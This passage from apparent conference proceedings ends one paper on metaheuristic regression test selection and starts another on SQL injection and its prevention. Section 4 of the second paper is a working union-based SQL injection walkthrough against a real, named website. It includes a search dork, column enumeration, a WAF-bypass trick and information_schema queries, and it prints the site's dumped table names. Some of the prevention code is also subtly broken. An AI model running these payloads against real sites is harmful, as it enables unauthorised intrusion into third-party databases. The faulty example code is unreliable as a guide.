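    return min(memory, key=obj)

print(crow_search(lambda x: sum(v * v for v in x)))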

4.3 Harris Hawks Optimization Algorithm

In 2019, Heidari et al. developed a novel nature-inspired optimization algorithm


named Harris Hawks Optimization (HHO) [31]. The inspiration of the algorithm is the
hunting behavior of Harris hawks. The social behavior followed by the hawks is to track
and dive on the prey. According to this algorithm, a group of hawks attacks the rabbit
(prey) by surprise from different directions to catch it. The Harris hawks' chase model
is very effective against the escape pattern of the prey. The leading hawk attacks the
targeted prey, follows it, quickly moves out of sight, and the other hawks continue the
chase. This strategy exhausts the prey, and finally a hawk captures it. For constrained
problems, HHO is well suited in comparison with other optimization algorithms. HHO is a
global optimizer which maintains the balance between two phases: exploration and
exploitation. Figure 1 represents the various phases of HHO.

Fig. 1 Various phases of HHO [31]
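
As a minimal sketch of the exploration/exploitation switch reported for HHO [31], the escaping energy of the prey can be modelled as E = 2·E0·(1 − t/T); while |E| ≥ 1 the hawks explore, otherwise they exploit. The besiege and rapid-dive strategies of the full algorithm are deliberately omitted here, and the code is only illustrative.

# Skeleton of the HHO phase switch driven by the prey's escaping energy (illustrative only).
import random

def hho_phase_schedule(max_iter=500):
    """Return, per iteration, whether HHO would explore or exploit under this energy model."""
    phases = []
    for t in range(max_iter):
        e0 = random.uniform(-1, 1)               # initial energy, redrawn every iteration
        energy = 2 * e0 * (1 - t / max_iter)     # magnitude shrinks as iterations progress
        phases.append("exploration" if abs(energy) >= 1 else "exploitation")
    return phases

schedule = hho_phase_schedule()
print(schedule[:5], schedule[-5:])               # exploration becomes rarer as iterations progress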

5 Experimental Design and Results

In this section, the author has discussed experimental design, results, and performance
analysis of Cuckoo Search (CS), Crow Search Algorithm (CSA), and Harris Hawks
Optimization (HHO) Algorithm to find the optimal solution in terms of total fault
coverage and execution time of RTCS problem. The subsection discusses the research
objectives formed, parameters setting of different metaheuristic approaches, research
hypothesis, and subject programs utilized to evaluate the performance.

5.1 Research Objectives

In this paper following research questions have been formed to evaluate and analyze
the performance of the used algorithms:
RQ1. Are there any significant differences in the fault coverage capabilities of the
three adopted algorithms for the RTCS problem?
RQ2. Is there any effect of execution time on the performance of the three different
approaches used in the study?

Table 1 Parameter setting utilized for CS, CSA and HHO

CS algorithm: No. of nests (N) = 30; probability to discover an alien egg by a host bird = 0.1
CSA algorithm: Population size (N) = 30; awareness probability = 0.1; flight length = 2; no. of iterations = 500
HHO algorithm: Population size (N) = 30; no. of iterations = 500

5.2 Parameter Setting

The parameter setting utilized for CS, CSA, and HHO on which the whole experiment
is performed are represented in Table 1:

5.3 Research Hypotheses

In order to answer the research questions formed in sub-Sect. 5.1, two research
hypotheses have been formed:
Ho: CS = CSA = HHO.
Ha: CS ≠ CSA ≠ HHO.
Ho: Overall_Execution_Time of CS = Overall_Execution_Time of CSA =
Overall_Execution_Time of HHO.
Ha: Overall_Execution_Time of CS ≠ Overall_Execution_Time of CSA ≠
Overall_Execution_Time of HHO.

5.4 Results and Discussion

In this experiment, the three algorithms are executed 15 times, and the number of faults
covered is selected as the evaluation parameter under the control parameter settings
already discussed in Table 1. A total of 500 iterations is considered as the stopping
criterion in each run, and the execution time required by each algorithm to catch the
maximum number of faults is also analyzed.
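
The statistical analysis below was carried out in SPSS 20; purely as an illustration, a comparable two-way ANOVA could be reproduced in Python as sketched here, assuming a long-format results table with one row per run and columns Algo, Subject and Fault_Cov (the file name and column names are our assumptions).

# Rough sketch of a comparable two-way ANOVA in Python (the paper itself used SPSS 20).
import pandas as pd
from statsmodels.formula.api import ols
from statsmodels.stats.anova import anova_lm

results = pd.read_csv("rtcs_runs.csv")           # assumed file: Algo, Subject, Fault_Cov per run
model = ols("Fault_Cov ~ C(Algo) * C(Subject)", data=results).fit()
print(anova_lm(model, typ=2))                    # F statistics and p-values for each factor
print(results.groupby("Algo")["Fault_Cov"].mean())   # marginal means per algorithm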
Answer to Research Question1:
In order to answer the Research Question1, we analyzed the mean values of total
fault coverage. Table 2 depicts the marginal means of fault coverage of different
algorithms on different subject programs. The highlighted mean indicates that the
Cuckoo Search (CS) algorithm performs better than the other adopted algorithms, i.e.,
the Crow Search Algorithm (CSA) and the Harris Hawks Optimization (HHO) Algorithm

Table 2 Calculated marginal means of algorithms


Dependent variable: Fault_Cov
Algo Mean Std. Error 95%-Confidence interval
Lower-Bound Upper-Bound
HHO 7.646 0.009 7.628 7.664
CSA 7.678 0.009 7.660 7.696
CS 7.831 0.009 7.814 7.849

Table 3 Tests of between-subjects effects


Two-way ANOVA test conducted on fault coverage (at α = 0.05, confidence interval = 95%)
Source Type-III Sum of squares df Mean Square F Sig
Corrected model 22,128.489a 35 632.243 14,074.406 0.000
Intercept 96,512.356 1 96,512.356 2,148,469.926 0.000
Algo 10.604 2 5.302 118.025 0.000
Subject 22,065.941 11 2005.995 44,655.620 0.000
Algo* Subject 51.944 22 2.361 52.561 0.000
Error 71.156 1584 0.045
Total 118,712.000 1620
Corrected Total 22,199.644 1619

in terms of maximum fault coverage. The tests are performed with the help of the SPSS
20 tool, and the results are represented in Tables 2 and 3.
To further confirm these results, a two-way ANOVA test is also performed, and the
obtained significance value is less than 0.05 at a 95% confidence interval, as shown
in Table 3. The results show that null hypothesis is rejected in favor of alternate
hypothesis. Finally, Fig. 2 shows that the fault coverage capabilities of Cuckoo Search
are better than the other adopted algorithms.
Answer to Research Question 2:
In order to answer the Research Question2, we analyzed the marginal means of
execution time of the three different algorithms. Table 4 shows the mean execution
time of the adopted algorithms. The highlighted mean value of execution time shows
that the Crow Search Algorithm (CSA) is significantly faster than the other adopted
algorithms. In Table 5, a two-way ANOVA test is conducted to further validate the
achieved results. The results of the two-way ANOVA test show that the significance
value is less than 0.05, which means that the null hypothesis is rejected in favor of
the alternate hypothesis. So, we state that the performance of the Crow Search
Algorithm (CSA) in terms of execution time is better than that of the CS and HHO algorithms.
Fig. 3 shows the estimated marginal means of execution time of adopted algo-
rithms which validate the above achieved results of Tables 4 and 5 that execution
time of CSA is better than the CS and HHO algorithms.

Fig. 2 Subject program and algorithm performance of fault coverage

Table 4 Calculated marginal means of algorithms


Dependent variable: Exe_Time
Algo Mean Std. Error 95%-Confidence interval
Lower-bound Upper-bound
HHO 4.090 0.026 4.039 4.141
CSA 0.707 0.026 0.656 0.759
CS 1.681 0.026 1.630 1.732

Table 5 Tests of between-subjects effects


Two-way ANOVA Test conducted on Execution Time (at α = 0.05, confidence interval = 95%)
Source Type-III sum of squares df Mean square F Sig
Corrected Model 3421.280a 35 97.751 267.215 0.000
Intercept 7554.027 1 7554.027 20,649.957 0.000
Algo 3274.750 2 1637.375 4475.986 0.000
Subject 57.655 11 5.241 14.328 0.000
Algo* Subject 88.875 22 4.040 11.043 0.000
Error 579.448 1584 0.366
Total 11,554.756 1620
Corrected Total 4000.729 1619

Fig. 3 Subject program and algorithm performance of execution time

6 Conclusion and Future Scope

On the basis of the results collected and discussed in Sect. 5.4, the author concludes
on the performance of all the adopted metaheuristic algorithms on RTCS. The answers
to the framed research questions show that, while solving RTCS problems using the
fault coverage and execution time parameters, the performance of the adopted
algorithms varies. The results reflect that the fault coverage capabilities of the
Cuckoo Search (CS) algorithm are better than those of the CSA and HHO algorithms; on
the other hand, the execution time of the Crow Search Algorithm (CSA) is lower than
that of the other adopted algorithms. It is also clear from the above results that
Harris Hawks Optimization (HHO) is not well suited to solving RTCS problems, as it did
not give better results for either parameter, i.e., fault coverage or execution time.
In the future, authors will evaluate the performance of other metaheuristic algo-
rithms to solve RTCS multi-objective problems in minimum execution time with
maximum fault coverage. Apart from RTCS problems, the authors can also perform
the comparative analysis of various recent metaheuristic algorithms to evaluate
the performance for Test suite minimization as well as for test case prioritization
problems.

References

1. Vierhauser, M., Rabiser, R., & Grünbacher, P. (2014). A case study on testing, commis-
sioning, and operation of very-large-scale software systems. In 36th International Conference
on Software Engineering, ICSE Companion 2014—Proceedings (pp. 125–134).

2. Rothermel, G., Untch, R. H., Chu, C., & Harrold, M. J. (1999). Test case prioritization: an
empirical study. In 1999 International Conferences Software Maintenance ICSM99.
3. Zhang, L. (2018). Hybrid regression test selection. In ICSE ’18 40th International Conferences
Software Engineering (pp. 199–209).
4. Rothermel, G., & Harrold, M. J. (1997). A safe, efficient regression test selection technique, no. 2, pp. 1–35.
5. Harrold, M. J., et al. (2001). Regression test selection for Java software. ACM SIGPLAN Notices, 36(11), 312–326.
6. Briand, L. C., Labiche, Y., & He, S. (2009). Automating regression test selection based on
UML designs. Information and Software Technology, 51(1), 16–30.
7. Orso, A., Shi, N., & Harrold, M. J. (2004) Scaling regression testing to large software systems.
In Proceedings of ACM SIGSOFT Symposium Foundation Software and Engineering (pp. 241–
251).
8. Fister, I., Yang, X. S., Brest, J., & Fister, D. (2013). A brief review of nature-inspired algorithms
for optimization. Elektroteh. Vestnik/Electrotechnical Rev., 80(3), 116–122.
9. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran, M.
(2020). An optimal pruning algorithm of classifier ensembles: dynamic programming approach.
Neural Computer Application, 32(20), 16091–16107.
10. Alweshah, M., Alzubi, O. A., & Alzubi, J. A. (2016). Solving Attribute Reduction Problem
using Wrapper Genetic Programming. International Journal of Computer Science and Network
Security, 16(5), 77–84.
11. Alzubi, O., Alzubi, J., Tedmori, S., Rashaideh, H., & Almomani, O. (2018). Consensus-based
combining method for classifier ensembles. The International Arab Journal of Information
Technology, 15(1), 76–86.
12. Do, H., Elbaum, S., & Rothermel, G. (2005). Supporting controlled experimentation with
testing techniques: An infrastructure and its potential impact. Empirical Software Engineering,
10(4), 405–435.
13. Yoo, S., & Harman, M. (2007) Pareto efficient multi-objective test case selection. In 2007 ACM
International Symposium on Software Testing and Analysis ISSTA’07 (pp. 140–150).
14. Maia, C. L. B., Do Carmo, R. A. F., De Freitas, F. G., De Campos, G. A. L., & De Souza, J.
T. (2009). A Multi-objective approach for the regression test case selection problem. In XLI
Brazilian Symposium Operation Research XLI SBPO 2009 (pp. 1824–1835).
15. De Souza, L. S., & Prud, R. B. C. (2014). Multi-objective test case selection : a study of the
influence of the catfish effect on PSO based strategies. In An. do XV Work. Testes e Tolerância
a Falhas—WTF 2014 (pp. 3–58).
16. Narciso, E. N., Delamaro, M. E., & De Lourdes Dos Santos Nunes, F. (2014). Test case selection:
A systematic literature review. International Journal of Software Engineering and Knowledge
Engineering, 24(4), 653–676.
17. Panichella, A., Oliveto, R., Di Penta, M., & De Lucia, A. (2015). Improving multi-objective
test case selection by injecting diversity in genetic algorithms. IEEE Transactions on Software
Engineering, 41(4), 358–383.
18. Rosero, R. H., Gómez, O. S., & Rodríguez, G. (2016). 15 Years of software regression
testing techniques—A survey. International Journal of Software Engineering and Knowledge
Engineering, 26(5), 675–689.
19. Hafez, S., Elnainay, M., Abougabal, M., & Elshehaby, S. (2016). Potential-fault cache-based
regression test selection. In 2016 IEEE/ACS 13th International Conference of Computer
Systems and Applications (AICCSA) (vol. 0).
20. Kazmi, R., Jawawi, D. N. A., Mohamad, R., & Ghani, I. (2017) Effective regression test case
selection: A systematic literature review. ACM Computing Surveys, 50(2).
21. Choudhary, A., Agrawal, A. P., & Kaur, A. (2018). An effective approach for regression test
case selection using pareto based multi-objective harmony search. In Proceedings of the 11th
International Workshop on Search-Based Software Testing (vol. August, pp. 13–20).
22. Bajaj, A., Sangwan, O. P. (2018). A survey on regression testing using nature-inspired
approaches. In 2018 4th International Conference on Computing Communication and
Automation (ICCCA) (pp. 1–5).

23. Agrawal, A. P., & Kaur, A. (2018). A comprehensive comparison of ant colony and hybrid
particle swarm optimization algorithms through test case selection. Advances in Intelligent
Systems and Computing, 542(August), 397–405.
24. Correia, D., Abreu, R., Santos, P., Nadkarni, J. (2019) MOTSD: A multi-objective test selec-
tion tool using test suite diagnosability. In ESEC/FSE 2019—Proceedings of the 2019 27th
ACM Joint Meeting on European Software Engineering Conference and Symposium on the
Foundations of Software Engineering (no. May, pp. 1070–1074).
25. Gladston, A., & Niranjana Devi, N. (2020). Optimal test case selection using ant colony and
rough sets.International Journal of Applied Evolutionary Computation (IJAEC), 11(2), 1–14.
26. Agrawal, A. P., Choudhary, A., & Kaur, A. (2020). An effective regression test case selection
using hybrid whale optimization algorithm. International Journal of Distributed Systems and
Technologies (IJDST)., 11(1), 53–67.
27. Yang, X. S., & Deb, S. (2009). Cuckoo search via Lévy flights. In 2009 World Congress on Nature and Biologically Inspired Computing (NaBIC) (pp. 210–214). IEEE.
28. Yang, X. S., & Deb, S. (2010). Engineering optimisation by cuckoo search. International
Journal of Mathematical Modelling and Numerical Optimisation, 1(4), 330–343.
29. Askarzadeh, A. (2016). A novel metaheuristic method for solving constrained engineering
optimization problems: Crow search algorithm. Computers and Structures, 169, 1–12.
30. Gupta, D., Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & de Albuquerque,
V. H. C. (2020). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computing and Applications, 32(15), 10915–10925.
31. Heidari, A. A., Mirjalili, S., Faris, H., Aljarah, I., Mafarja, M., & Chen, H. (2019). Harris hawks
optimization: Algorithm and applications. Future Generation Computer Systems, 97(March),
849–872.
A Comprehensive Study on SQL
Injection Attacks, Their Mode, Detection
and Prevention

Sabyasachi Dasmohapatra and Sushree Bibhuprada B. Priyadarshini

Abstract SQL injection denotes a type of attack that exploits security vulnerabilities in
the database systems behind an application. Such vulnerabilities are mostly encountered
within web pages having dynamic content. In this study, we discuss how attackers take
advantage of such vulnerabilities and execute malicious code, along with strategies to
counter the resulting negative impacts on database systems. In this context, web
applications are commonly employed for online services spanning from informal
communication to the administration of transaction accounts, and they therefore handle
private user information that is confidential. The underlying problem is that this
information is vulnerable to attacks owing to unauthorized access, where attackers gain
entry into the system through different hacking and cracking techniques with malicious
intentions. An attacker can employ well-crafted queries and novel strategies to bypass
authentication while attaining complete control over the web application as well as the
server. Many algorithms have been developed to date to encode and validate query data in
order to prevent such attacks by detecting undesired changes to the intended query. In
this paper, we cover the background of injection attacks, the types of injection attack,
various case studies and the preventive measures associated with SQL injection attacks,
along with a suitable illustration.

Keywords SQL · SQLIA · Injection

1 Introduction to Structured Query Language Injection (SQLi)

The World Wide Web (WWW) has undergone a remarkable journey over the recent few
years. Businesses and governments have come to know that web applications can provide
a fruitful, well-planned and well-grounded resolution to the challenge of exchanging
S. Dasmohapatra · S. B. B. Priyadarshini (B)


Siksha ‘O’ Anusandhan Deemed to be University, Bhubaneswar, India


the data and managing business in the present century. However, in the rush to get their
applications online, or possibly through simple ignorance, different software corporations
overlook or postpone critical safety concerns [1]. The WWW keeps expanding, and attacks
on the web expand at the same time. Therefore, security of web implementations and of the
communication through them is significant [2]. To assemble a correct approach, developers
must have the knowledge that security is a basic element of any software product and that
protection must be built into the software as it is being written [1]. SQL injection is a
class of injection threat in which the consumer supplies data that is integrated into a
Structured Query Language (SQL) query for the database. In this phase, the consumer's data
are interpreted as part of the SQL queries. SQL instructions specified by the attacker are
thus passed directly or indirectly to the database through the particular exposure. This
kind of threat is unsafe for every web application that receives data from clients and
passes it on in SQL statements to an underlying database [3].
Such an assault may be carried out by including strings of harmful characters within the
field values of a form, or through crafted arguments passed in the URL. Injection assaults
in many cases take advantage of improper validation of input/output data. A Structured
Query Language Injection Attack (SQLIA) is a code-injection attack in which harmful SQL
directives are injected by means of the data entered by the client into the application;
these are thereafter passed to the database instance for execution, with the purpose of
affecting the behaviour of the intended SQL statements [2]. There are various techniques
that a web designer/system administrator can apply, without which contradictory results
and assaults accumulate in their systems. These strategies are used by a developer or
computer administrator during the development cycle of the application and include the
use of parameterized code, limited privileges, dedicated accounts, customized error
messages, etc. [2].
However, such strategies remain an effective way to prevent SQL injection vulnerabilities.
These kinds of methods are prone to human error and are not applied as fastidiously and
consistently as automated methods. Although most developers try to write the code of
their websites carefully, it is challenging to apply defensive coding cautiously and
successfully to every source of input. As a result, researchers have proposed a variety
of strategies and techniques to aid developers and make up for faults in the application
of defensive coding. These strategies make use of static, dynamic or hybrid analysis for
detecting SQLIA. For example, as shown in Fig. 1, an attacker typically types into the
text boxes of an online login form a username and password crafted to make the WHERE
condition always true and thereby bypass the database security system [4–6].
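
To see why such a statement becomes true, consider the sketch below, which mimics the vulnerable pattern of concatenating user input directly into a SQL string; the query template and inputs are invented and no real application is involved.

# Illustration of the always-true ("tautology") injection sketched in Fig. 1.
def build_query(username, password):
    # Vulnerable pattern: user input is concatenated directly into the SQL string.
    return ("SELECT * FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")

print(build_query("admin", "secret"))
print(build_query("' OR '1'='1", "' OR '1'='1"))
# The second call yields ... WHERE username = '' OR '1'='1' AND password = '' OR '1'='1',
# which is true for every row because OR is evaluated last, so the login check is bypassed.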
Moreover, there are further methods for countering SQLIA which we describe in the rest
of this paper. The remainder of this topic is organized as follows: we start by
motivating the notion of vulnerability and introducing SQL injection attacks, and we
then examine the existing taxonomy

Fig. 1 SQL injection strategy

of SQL injection prevention and detection approaches. We assess and compare distinct
SQLIA countermeasures and indicate their deployment requirements. Finally, a brief
conclusion of the paper is given. Table 1 illustrates the vulnerabilities encountered
in various web applications.

1.1 Gathering Some Knowledge of Vulnerability and SQL


Injection

A vulnerability is a weak spot within an application that can be a design flaw or a
development fault. A web attacker can misuse such vulnerabilities to steal individual or
company data. Broken authentication, cross-site scripting (XSS), weak session management
and cross-site request forgery (CSRF) are a few programming-level vulnerabilities found
in most modern-day internet applications [1–10]. According to reports furnished by OWASP
[5] and WHID [6], SQLIA and XSS attacks are quite common. SQLIA is considered a severe
class of attack, striking at the confidentiality, integrity and availability of data. A
SQLI vulnerability is exploited by supplying SQL code to a web form input field in order
to gain access for reading or altering data. Using this vulnerability, an attacker may
additionally choose to send his instructions straight to the web application and degrade
its overall performance. SQLI attacks can be classified into five principal classes based
on the vulnerabilities within web applications. This categorization is explained in
Table 1 [7–10].

Table 1 SQLIA categorization of vulnerability


Vulnerability Quick information
Bypassing web application authentication: This is the most common use made by attackers,
namely to skip the authentication process provided in web applications. Through this kind
of raid, the attacker supplies an input field value which, when executed, bypasses the
application's login check
Getting knowledge of database fingerprinting: This kind of assault is regarded as
pre-attack reconnaissance normally performed by an attacker. It is carried out by entering
inputs that create an illegal or logically incorrect query. The error messages expose the
names of the tables and the columns, and the attacker further comes to know which database
software is used by the back-end server
Injection with UNION query: In this kind of strike, the attacker pulls out records from a
table other than the one that was intended in the web application by the programmer. The
attacker supplies a crafted input to alter the data set returned for the base query
Damaging with additional injected query: This classification of assault is typically very
hazardous. The attacker's input to the web application causes a supplementary injected
query to be executed along with the real one
Remote execution of stored procedures: This form of strike is carried out by executing
procedures stored earlier by the web application developer

2 Categories of SQL Injection Attack

Different information reports suggest that more than 40,000 such assaults per day threaten
the real world, so it is a massive problem that calls for countermeasures which vary across
applications. Nowadays, many web programs use databases for saving the facts needed for the
web application's features, such as customer details, personal data and sensitive financial
records, in fields of every shape, from finance and government to social networks. All of
them gather a range of technologies, thus allowing programmers to develop web applications
for merchandise

Table 2 Kinds of SQLIA


Kinds of strike Functionality approach
Tautology A type of attack in which the injected condition always evaluates to true
Logically incorrect query This attack lets an attacker to get information about the back-end
database of a web application using error message
Stored procedure Built-in stored procedure is used with malicious SQL injection
codes
Union query UNION keyword is used to get information by joining the injected
query with safe query
Piggy-backed queries Additional malicious queries are inserted into an original injected
query

fascinating and beneficial to customers (e.g., e-shops, net banking). Table 2 describes
the types of SQL injection attack.

3 Prevention System

Researchers have proposed a variety of techniques to tackle SQLIA issues. Detection and
prohibition methods are categorized into two categories. The first is to be aware of SQLIA
by reviewing the malicious SQL code itself, using string matching, patterns and query
handling [8]. Another method makes use of information dependencies among data and objects
that are much less likely to change, in order to determine malicious behaviour at the data
server [8]. Other analysts suggest that developers design new schemes to mine the input
strings and detect malicious strings in order to prevent them from execution [8]. This
reduces the malicious entry of code and minimizes the vulnerability [6, 11, 12].
Since the treated protection troubles are associated with input validation, William [9]
recommended SQLIA avoidance based on taint tracking [9]. No safety device becomes
effective until its effectiveness is evaluated in a real-time environment. To defend a web
application against SQLI strikes, security has been provided as shown in Fig. 2 using
these methods. When an attacker goes through the web page using SQLIA, he sends crafted
requests to the server; because of this, the prevention machine has a verification
controller. These kinds of methods filter the customer inputs which generate malicious
requests [13, 14].
The first approach to do so is translating special strings into HTML character entities.
Other approaches work with regular expressions and exceptions.

Fig. 2 Interruption technique scenario

3.1 Log in Time Verification

The verification system is aimed at validating whether or not the sort of input submitted
by a customer is allowed. Real-time verification should take into account conditions such
as the format and the length of the inputted string. Which strings pass the verification
process and should be allowed for further validation is also considered. This method is
used to check the strings entered by the customer; through these methods, we can tell who
is trying to open the door without any authentication [11]. Verification should include
the following conditions to catch irregular methods of authentication:
• We have to whitelist the permitted strings for the structured fields to make sure of
strict input verification.
• Verification of constants such as radio buttons is also considered. We have to use
different validation methods to easily break down malicious input data.
• The code illustrated in Fig. 3 shows how to prevent a table name verification attack:
After this kind of process, the table name will be validated: the table name will now be
legal and cannot be manipulated by the attacker [11]. Another issue is the drop-down form,
through which an attacker can easily tamper with the data submitted for a table. Let us
assume a user gives a rating from 1 to 5; the user should have to pick a value from 1 to
5, and hence we have to write the PHP code as shown in Fig. 4.
Information which is collected from outside sources should be verified. This rule should
apply to everyone who is going to use this process on web pages. These carriers

switch ($TableName) {
case 'fooTable': return true;
case 'barTable': return true;
default: return new
ErrorDataException('unexpected value provided as table name');
}

Fig. 3 Preventing Table name verification attack

<?php
if (isset($_POST["selRating"])) {
    $number = $_POST["selRating"];
    if (is_numeric($number) && ($number > 0) && ($number < 6)) {
        echo "Selected rating: " . $number;
    } else {
        echo "The rating has to be a number between 1 and 5!";
    }
}

Fig. 4 PHP Code for Drop-down Technique

may also be under an attack themselves and send malformed records even without their
knowledge [10, 11].

3.2 Parametrized Query

This kind of method has the capability to compile the query before the provided SQL code
is executed. The approach treats the inputted data separately and lets the database
validate it, so that access to the server is authenticated correctly [11]. The data
furnished by the customer are bound as parameters during the authentication process. This
kind of coding helps to defeat SQLIA. It can be done by using the corresponding queries of
the MySQLi branch. Since PHP 5.1, PHP Data Objects (PDO) is the upgraded way of working
with such a MySQL database to prevent injection attacks. PDO carries out strategies which
simplify the usage of this kind of query and reduces the code to its simplest form so that
it can be operated with different data servers like MySQL, etc. [8–11]. The PHP code for a
parameterized query is illustrated in Fig. 5.

<?php
$id = $_GET['id'];
$database_connection = new
PDO('mysql:host=localhost;dbname=sql_injection_exampl
e', 'dbuser', 'dbpasswd');
//preparing the query
$sql = "SELECT username FROM users WHERE id = :id";
$queries = $database_connection->prepare($sql);
$queries->bindParam(':id', $id);
$queries->execute();
//getting the result
$queries->setFetchMode(PDO::FETCH_ASSOC);
$result = $queries->fetchColumn();
print(htmlentities($result));

Fig. 5 PHP code for parameterized query

3.3 Stored Procedures

This method is used by the developer to group more than one statement. A Transact-SQL
query is used with logical segments to obtain an execution routine. The procedure is
always saved as a named object in the MySQL data server. Whenever we want to execute some
code, it can be simplified by the stored procedure and verified in the same way. The
technique mentioned below is an example of a stored procedure, where we first create the
table that the stored procedure will use (Fig. 6).
Let us consider an employer who wants to gather some information about salaries. In the
beginning, we have to create a user named 'examp' as follows:
CREATE USER ’examp’@’localhost’ IDENTIFIED BY ’mypassword’;
This user is only granted the right to execute the procedure and to fetch data from the
server, as outlined below:
grant execute on windy.* to examp@‘%‘

CREATE TABLE `salary_1` (


`empid` int(11) NOT NULL,
`sal` int(11) DEFAULT NULL,
PRIMARY KEY (`empid`)
) ENGINE=InnoDB DEFAULT
CHARSET=utf8;

Fig. 6 Creating table using stored procedure



DELIMITER $$

CREATE PROCEDURE `avg_sal`(out avg_sal decimal)


BEGIN
select avg(sal) into avg_sal from salary;
END

Fig. 7 Stored procedure

$database_connection = new
PDO('mysql:host=localhost;dbname=windy', 'examp',
'mypassword');
$queries = $database_connection->exec('call
avg_sal(@out)');
$resi = $queries->queries('select @out')->fetchAll();
print_r($resi);

Fig. 8 PDO to call stored procedure

The stored procedure is given in Fig. 7


In this process, through the above code, the avg_sal stored procedure has been created
and will be saved in the data server for future calls [10, 11]. We have to use PDO to call
the stored procedure from the PHP application as shown in Fig. 8. As per the user's
request, $resi will hold the average salary, and the user may then bring out the output
with PHP methods. In the database security process, it is essential to mediate between the
user and the table so that the user obtains the required information without any direct
access to the table, which can be done by a stored procedure only.

3.4 Escaping

In this kind of prevention technique, customer-provided input is always passed through the
character escaping method of the DBMS. With this technique, the SQL query written by the
developer is not confused by the input, and unintended SQL functions are not executed.
Here, we have used mysqli_real_escape_string() in PHP. Figure 9 shows how escaping handles
an attempt to bypass the login field authentication [7].

$database_connection = mysqli_connect("localhost", "user", "password","db"); $username =


mysqli_real_escape_string($database_connection,$_POST['username']);
$password = mysqli_real_escape_string($database_connection,$_POST['password']);
$queries = "SELECT * FROM users WHERE username = '" . $username."' AND password =
'". $password. "'";

Fig. 9 Bypassing loging field authentication

Without escaping, the above code would be vulnerable; the function places the escape
character '\' in front of characters such as a single quote. By this technique, we can
prevent SQLIA with only a few alterations.

3.5 Avoiding Administrative Privileges

Database accounts should not be validated with root access. Root access should be granted
only if truly needed, given that attackers could otherwise gain admission to the total
server [11]. Following this idea, it is best to put into effect least privilege for the
data server to protect the software against SQL injection [9].

3.6 Firewall Applications

This is one of the best prevention techniques to avoid SQLIA. It is also called a web
application firewall (WAF) [12]. With the firewall technique, threats or malicious inputs
from the user are identified and monitored before they reach the database. Basically, it
is a checkpoint between the internet and the web application for authentic logins. A web
application firewall helps to secure the website through well-defined rules of safety
guidelines. These kinds of guidelines are different for every web application according to
its need for security. The policies of the WAF inform the firewall of the weaknesses of
the website and of web security through its searching procedures. With this information,
the WAF monitors the users and their requests to find the malicious inputs and to block
them [11, 12]. Web firewalls help to protect against different malicious actions and
security threats, some of which are cross-site scripting, poisoning of cookies, session
hijacking, SQLIA, etc. Moreover, a web firewall also gives the benefits written below.
• It automatically protects against basic known and unknown malicious injection attacks.
• It also monitors HTTP traffic and helps the web application with real-time safety when
an attacker is logging in or trying to get into the data server without authorization.
Finally, to avoid malicious attacks, a developer should know about all kinds of attacks
and their prevention techniques for overcoming the security threats [11].

4 Example of Union-Based SQL Injection

Website name: http://www.tncgroup.pk/


=============================
Google dork used to find vulnerable files and parameters: inurl:.php?id= site:http://www.tncgroup.pk/
Vulnerable link to proceed: http://tncgroup.pk/content.php?Id=2

4.1 Step 1. Finding the Error

* http://tncgroup.pk/content.php?Id=-2’ – putting a single quote after the parameter


to check if error occurs if yes, the proceed.
!!!!! error occurs!!!!!

4.2 Step 2. Finding the Total Number of Columns

*Command used: order by n- (where n should start from 1 until another error occurs).
-----------------
Implementation.
-----------------
* http://tncgroup.pk/content.php?Id=2 order by n- (where n should start from 1 until another error occurs).
* http://tncgroup.pk/content.php?Id=2 order by 1-
* http://tncgroup.pk/content.php?Id=2 order by 2-
* http://tncgroup.pk/content.php?Id=2 order by 3-
*
*
*
* http://tncgroup.pk/content.php?Id=2 order by 14-
!!!!! Error occurs!!!!!

--- (Error occurs at 14).
--- That means (14 − 1 = 13), so there are a total of 13 columns.

4.3 Step 3. Finding the Vulnerable Column from the Total Number of Columns

Now we must find the vulnerable columns from the total of 13 columns.
Command used: union select 1,2,3,4,5,6,7,8,9,10,11,12,13 --+
---------------------------------------------------------------------------
Implementation: http://tncgroup.pk/content.php?Id=-2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 --+
----------------------------------------------
* -(minus) is used before the parameter to bypass the Web application firewall (WAF).
Output:
We get columns 2 and 3 as vulnerable; since 2 is rendered bolder than 3, we will proceed with column 2.
Note:
-- write the function names in place of the vulnerable columns.
* to get the database name - database ()
* to get the version name - version ()
* to get the username - user ()

Example:
http://tncgroup.pk/content.php?Id=-2 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13 --+
http://tncgroup.pk/content.php?Id=-2 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13 --+
http://tncgroup.pk/content.php?Id=-2 union select 1,user(),3,4,5,6,7,8,9,10,11,12,13 --+

4.4 Step 4. Finding the Table Names Under the Database

Now we must find the table names under the database.


Command used:
(a) group_concat(table_name)

(b) from information_Schema.tables where table_schema=database ()


* Command no. 1 should be written in the place of the vulnerable column we found, and command no. 2 should be written after 13, which is the total number of columns.
Implementation:
-------------------------
http://tncgroup.pk/content.php?Id=-2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from information_Schema.tables where table_schema=database() --+
After executing the above command, we got the output as:
-----------------------------------------------------
TBL_ADDRESS_BOOK, TBL_ADMIN, TBL_AMOUNT_STATUS, TBL_BANNERS, TBL_BRANDS, TBL_CART, TBL_CAT,
TBL_COLORS, TBL_COLORS_IMG, TBL_COMPAIN, TBL_CONTENTS, TBL_COUNTRY, TBL_COUPON, TBL_CURRENCY,
TBL_DESIGN_DETAIL, TBL_FAQS, TBL_FEEDBACK, TBL_GROUP, TBL_INQ, TBL_INQ_DETAIL, TBL_INQ_STATUS,
TBL_INQUIRY, TBL_INQUIRY_DETAIL, TBL_LETTER, TBL_LOGOS, TBL_LOGS, TBL_MAIL_GROUP, TBL_MAIN,
TBL_MEMBERS, TBL_MORE, TBL_NEWS, TBL_NEWSLETTER, TBL_OPT_VALUES, TBL_OPTIONS, TBL_ORDER_CUSTOMER,
TBL_ORDER_ITEMS, TBL_ORDER_STATUS, TBL_ORDERS, TBL_PAY_STATUS, TBL_PIC_CATEGORY, TBL_PICTURES,
TBL_PROD_OPT, TBL_PROD_SALE, TBL_PRODS, TBL_RELATED, TBL_REVIEW, TBL_SCHOOLS, TBL_SECTION,
